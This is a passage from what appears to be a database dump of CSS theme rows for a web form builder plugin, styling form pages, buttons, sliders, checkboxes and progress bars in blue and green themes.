inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00559D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00559D ), color-stop(67%, #005BA7 ), color-stop(100%, #00559D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00559D 0%, #005BA7 67%, #00559D 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FA6C6;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #0057A0;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(37,'Theme 10 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8E5DB;\r\nborder: 1px solid #007616;\r\nmargin-bottom: 10px;\r\ncolor: #007616;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/03/next_hoverbg.png) url([SITE_ROOT]/images/01/03/previous_hover.png) url([SITE_ROOT]/images/01/03/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: \"\";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/03/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #006C14 ;\r\nbackground: -moz-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #006C14 ), color-stop(20%, #018819 ), color-stop(80%, #018819 ), color-stop(100%, #006C14 ));\r\nbackground: -webkit-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -o-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -ms-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: linear-gradient(to right, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #0DBB2C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #006C14;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D8E5DB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #006C14;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #006312 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #006312 ), color-stop(20%, #047519 ), color-stop(80%, #057C1C ), color-stop(100%, #069140 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"password\"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #006C14;\r\n	cursor: pointer;\r\n	background-color: #7FB589;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #006C14;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #008118 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #008118 ), color-stop(67%, #089723 ), color-stop(100%, #069C22 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #008118 0%, #089723 67%, #069C22 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FB589;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #069B22;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, 